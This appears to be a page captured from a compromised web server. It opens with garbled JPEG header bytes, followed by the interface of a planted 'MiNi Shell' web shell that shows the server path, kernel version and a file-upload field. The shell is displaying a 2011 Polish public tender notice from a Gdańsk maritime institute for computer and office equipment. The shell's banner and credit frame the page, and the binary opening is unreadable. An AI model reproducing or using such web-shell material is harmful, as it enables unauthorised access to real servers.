JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111116/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111116/298467-N-2011.html

<p class="kh_header"><b>Gdańsk: dostawa sprzętu komputerowego i biurowego</b><br>
<b>Numer ogłoszenia: 298467 - 2011; data zamieszczenia: 16.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Morski w Gdańsku , ul. Długi Targ 41/42, 80-830 Gdańsk, woj. pomorskie, tel. -58 3011641, 3018385.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.im.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa sprzętu komputerowego i biurowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu komputerowego, oprogramowania  oraz sprzętu biurowego, wg poniższego zestawienia.

Zgodnie z załącznikiem nr 2 do SIWZ:  
a) notebook 6 -  szt. 
b) komputer stacjonarny  -  2 szt.
c) projektor  - 1 szt.
d) urządzenie wielofunkcyjne laserowe - 1 szt. 
e) drukarka laserowa monochromatyczna A4 - 1 szt.
f) moduł dyskowy - 1 szt. 
g) dysk twardy  - 10 szt.
h) oprogramowania, licencje i taśma. 

Zgodnie z załącznikiem nr  2a do SIWZ:  
a) drukarka laserowa monochromatyczna A4 - 9 szt. 
b) urządzenie wielofunkcyjne laserowe - 6 szt.
c) zasilacz awaryjny UPS - 35 szt.
d) wymienny moduł bateryjny do zasilacza - 15 szt.
e) listwa zasilająco-filtrująca - 55 szt.
f)  zasilacze -20 szt.
g) dyski twarde 14 szt.
h) Switch- 40 szt.  
i) oprogramowania i licencje.
j) klawiatury, pamięci, karty graficzne, Patchcord UTP. 
 
Zgodnie z załącznikiem nr  2b do SIWZ:  
a) używane komputery biurowe -20 szt.   

Zgodnie z załącznikiem nr  2c do SIWZ:  
a) sprzęt biurowy:
urządzenie wielofunkcyjne -1szt.
niszczarka dokumentów - 2 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.21.31.00-6, 30.21.61.00-0, 30.23.21.10-8, 30.23.60.00-2, 30.23.72.80-5, 30.12.12.00-5, 30.19.14.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawcy nie wnoszą wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga potwierdzenia powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga potwierdzenia powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga potwierdzenia powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga potwierdzenia powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga potwierdzenia powyższego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W zakresie potwierdzenia, że oferowane dostawy sprzętu komputerowego odpowiadają  określonym wymaganiom, Zamawiający wymaga przedłożenia nw. dokumentów.  

Dla przedmiotu zamówienia opisanego w poz. 1.1 - 1.15  zał. nr 2: 
Certyfikat ISO 9001:2000 dla producenta sprzętu, Certyfikat ISO 14001 dla producenta sprzętu, Certyfikat Microsoft, potwierdzający poprawną współpracę oferowanych modeli komputerów z następującym system operacyjnym: Windows 7 32bit i 64bit (wydruk ze strony internetowej Microsoftu WHCL),  Deklaracja zgodności CE, Oświadczenia producenta jednostki potwierdzające spełnienie kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych, Certyfikat EnergyStar 5.0 lub wydruk potwierdzający że oferowany komputer znajduje się na liście zgodności dostępnej na stronie www.energystar.gov lub www.energystar.org 
Certyfikat ISO 9001:2000 na świadczenie usług serwisowych oraz autoryzacje producenta komputera dla Wykonawcy lub podmiotu świadczącego usługi serwisowe. Oświadczenie producenta komputera, że w przypadku nie wywiązywania się z obowiązków gwarancyjnych Wykonawcy lub podmiotu świadczącego usługę serwisu, przejmie na siebie wszelkie zobowiązania związane z serwisem.

Dla przedmiotu zamówienia opisanego w poz. 2.1 - 2.16 zał. nr 2:
Certyfikat Microsoft, potwierdzający poprawną współpracę oferowanych modeli komputerów z następującym system operacyjnym: Windows 7 32bit i 64bit (wydruk ze strony internetowej Microsoftu WHCL), Certyfikat ISO 9001 dla producenta sprzętu, Deklaracja zgodności CE, Oświadczenia producenta jednostki potwierdzające spełnienie kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych, Certyfikat EnergyStar 5.0 lub wydruk potwierdzający że oferowany komputer znajduje się na liście zgodności dostępnej na stronie www.energystar.gov lub www.energystar.org  Oświadczenie producenta lub jego reprezentanta, że głośność jednostki centralnej mierzona zgodnie z normą ISO 7779 oraz wykazana zgodnie z normą ISO 9296 w pozycji operatora w trybie pracy dysku twardego (WORK) wynosi maksymalnie 19 dB, Certyfikat ISO 9001:2000 na świadczenie usług serwisowych oraz autoryzacje producenta komputera dla Wykonawcy podmiotu świadczącego usługi serwisowe. Oświadczenie producenta komputera, że w przypadku nie wywiązywania się z obowiązków gwarancyjnych Wykonawcy lub podmiotu świadczącego usługę serwisu, przejmie na siebie wszelkie zobowiązania związane z serwisem.

Dla przedmiotu zamówienia opisanego w poz. 3.1 - 3.19 zał. nr 2
Certyfikat ISO 9001:2000 dla producenta sprzętu, Certyfikat ISO 14001 dla producenta sprzętu,  Certyfikat EnergyStar 5.0 lub wydruk potwierdzający że oferowany komputer znajduje się na liście zgodności dostępnej na stronie www.energystar.gov lub www.energystar.org . Deklaracja zgodności CE, Certyfikat ISO 9001:2000 na świadczenie usług serwisowych oraz autoryzacje producenta komputera dla Wykonawcy lub podmiotu świadczącego usługi serwisowe. 
Oświadczenie producenta komputera, że w przypadku nie wywiązywania się z obowiązków gwarancyjnych Wykonawcy lub podmiotu świadczącego usługę serwisu, przejmie na siebie wszelkie zobowiązania związane z serwisem.

Dla przedmiotu zamówienia opisanego w poz. 4.1 - 4.19 zał. nr 2
Certyfikat ISO 9001:2000 dla producenta sprzętu, Certyfikat ISO 14001 dla producenta sprzętu,  Certyfikat EnergyStar 5.0 lub wydruk potwierdzający że oferowany komputer znajduje się na liście zgodności dostępnej na stronie www.energystar.gov , lub www.energystar.org . Deklaracja zgodności CE,  Certyfikat ISO 9001:2000 na świadczenie usług serwisowych oraz autoryzacje producenta komputera dla Wykonawcy lub podmiotu świadczącego usługi serwisowe. 
Oświadczenie producenta komputera, że w przypadku nie wywiązywania się z obowiązków gwarancyjnych Wykonawcy lub podmiotu świadczącego usługę serwisu, przejmie na siebie wszelkie zobowiązania związane z serwisem.

Dla przedmiotu zamówienia opisanego w poz. 1 - 18 zał. nr 2b
Certyfikat Microsoft lub wydruk ze strony Microsoft WHCL, potwierdzający poprawną współpracę oferowanych komputerów z systemem operacyjnym Microsoft Windows XP Professional PL, Deklaracja CE,  Wydruk ze strony producenta komputera, umożliwiający identyfikację daty produkcji każdego z 20 szt. oferowanych komputerów. Wydrukować link do strony producenta komputera, umożliwiający dostęp do najnowszych sterowników i uaktualnień na stronie producenta zestawu, realizowany poprzez podanie na dedykowanej stronie internetowej producenta numeru seryjnego lub modelu komputera. 

W przypadku oferty dostawy sprzętu komputerowego jednego producenta, Zamawiający dopuszcza możliwość złożenia przez Wykonawcę jednego certyfikatu ISO, jednej autoryzacji producenta komputera dla Wykonawcy lub podmiotu świadczącego usługi serwisowe  oraz jednego oświadczenia producenta, że w przypadku nie wywiązywania się z obowiązków gwarancyjnych Wykonawcy lub podmiotu świadczącego usługę serwisu, przejmie na siebie wszelkie zobowiązania związane z serwisem.

Wykonawca może zamiast ww. Certyfikatów złożyć równoważne zaświadczenia wystawione przez podmioty mające siedzibę w innym państwie członkowskim Europejskiego Obszaru Gospodarczego. Wykonawca może zamiast zaświadczeń niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi  i europejskimi normami zarządzania środowiskiem, złożyć inne dokumenty potwierdzające odpowiednio stosowanie przez Wykonawców równoważnych środków zapewnienia jakości i stosowania równoważnych środków zarządzania środowiskiem.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany postanowień zawartej umowy w zakresie:
- zmiany ceny za przedmiot zamówienia w przypadku urzędowej zmiany stawki podatku od towarów i usług;
- wszelkich zmian umowy, o ile konieczność ich wprowadzenia będzie wynikała ze zmian w obowiązujących przepisach prawa;
- zmiany określonego typu i modelu oferowanego sprzętu komputerowego w przypadku zakończenia jego produkcji, wycofania go z produkcji, niedostępności na rynku, z tym, że cena wskazana w umowie nie może ulec podwyższeniu, a parametry techniczne nie mogą być gorsze niż pierwotnie oferowane;
- zmiany określonego typu i modelu oferowanego sprzętu komputerowego w razie zaistnienia przyczyn niezależnych od Wykonawcy tj. pożar, kradzież, uszkodzenie, z tym, że cena wskazana w umowie nie może ulec podwyższeniu, a parametry techniczne nie mogą być gorsze niż pierwotnie oferowane (dot. dostawy 20 szt. komputerów używanych);
-  zmianę podwykonawców którym Wykonawca powierzył część zamówienia do wykonania;
- zaistnienia innego niemożliwego do przewidzenia w momencie zawarcia umowy zdarzenia prawnego, ekonomicznego lub technicznego, za którą żadna ze stron umowy nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.im.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Morski w Gdańsku, ul. Długi Targ 41/42, 80-830 Gdańsk, I-sze piętro, pok nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.11.2011 godzina 13:00, miejsce: Instytut Morski w Gdańsku ul. Długi Targ 41/42, 80-830 Gdańsk, I-sze piętro - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> sprzęt komputerowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodnie z załącznikiem nr 2 do SIWZ:  
a) notebook 6 -  szt. 
b) komputer stacjonarny  -  2 szt.
c) projektor  - 1 szt.
d) urządzenie wielofunkcyjne laserowe - 1 szt. 
e) drukarka laserowa monochromatyczna A4 - 1 szt.
f) moduł dyskowy - 1 szt. 
g) dysk twardy  - 10 szt.
h) oprogramowania, licencje i taśma. 
Dostawa w terminie 14 dni od daty podpisania umowy 

Zgodnie z załącznikiem nr  2a do SIWZ:  
a) drukarka laserowa monochromatyczna A4 - 9 szt. 
b) urządzenie wielofunkcyjne laserowe - 6 szt.
c) zasilacz awaryjny UPS - 35 szt.
d) wymienny moduł bateryjny do zasilacza - 15 szt.
e) listwa zasilająco-filtrująca - 55 szt.
f)  zasilacze -20 szt.
g) dyski twarde 14 szt.
h) Switch- 40 szt.  
i) oprogramowania i licencje.
j) klawiatury, pamięci, karty graficzne, Patchcord UTP.
Zamawiający zastrzega sobie prawo do niezrealizowania przedmiotu zamówienia w całości, to jest w ilościach wykazanych w zał. nr 2a. Dostawy przedmiotu zamówienia wykazane w zał. 2a, realizowane będą sukcesywnie w okresie 12 m-cy od daty podpisania umowy, wg potrzeb Zamawiającego. Nie zrealizowanie przez Zamawiającego całości zamówienia wykazanego w zał. 2a w okresie ważności umowy, nie daje Wykonawcy podstawy do żądania realizacji przedmiotu umowy w oferowanych ilościach, po upływie okresu ważności umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.21.31.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> komputery używane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Używane komputery biurowe -20 szt.   
Zamawiający zastrzega sobie prawo do niezrealizowania przedmiotu zamówienia w całości, to jest w ilości 20 szt. Dostawy przedmiotu zamówienia wykazane w zał. 2b, realizowane będą sukcesywnie w okresie 12 m-cy od daty podpisania umowy, wg potrzeb Zamawiającego. Nie zrealizowanie przez Zamawiającego całości zamówienia wykazanego w zał. 2b w okresie ważności umowy, nie daje Wykonawcy podstawy do żądania realizacji przedmiotu umowy w oferowanych ilościach, po upływie okresu ważności umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> sprzęt biurowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> urządzenie wielofunkcyjne -1szt.
niszczarka dokumentów - 2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.12.00-5, 30.19.14.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com